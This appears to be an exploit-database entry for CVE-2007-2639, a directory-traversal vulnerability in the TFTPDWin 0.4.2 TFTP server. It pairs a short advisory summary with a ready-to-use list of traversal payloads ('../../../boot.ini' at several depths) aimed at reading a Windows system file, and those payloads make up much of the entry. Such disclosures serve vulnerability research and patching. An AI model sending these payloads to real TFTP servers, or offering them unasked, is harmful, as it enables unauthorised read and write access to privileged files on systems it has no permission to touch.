TFTP Server TFTPDWin 0.4.2 - Directory Traversal

Author: Digital Defense
type: remote
platform: windows
port: 
date_added: 2007-05-11 
date_updated: 2013-12-04 
verified: 1 
codes: CVE-2007-2639;OSVDB-36252 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/23937/info

TFTP Server TFTPDWIN is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue allows an attacker to gain read/write access to privileged directories and files.

TFTP Server TFTPDWIN 0.4.2 is vulnerable; other versions may also be affected.

../../../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini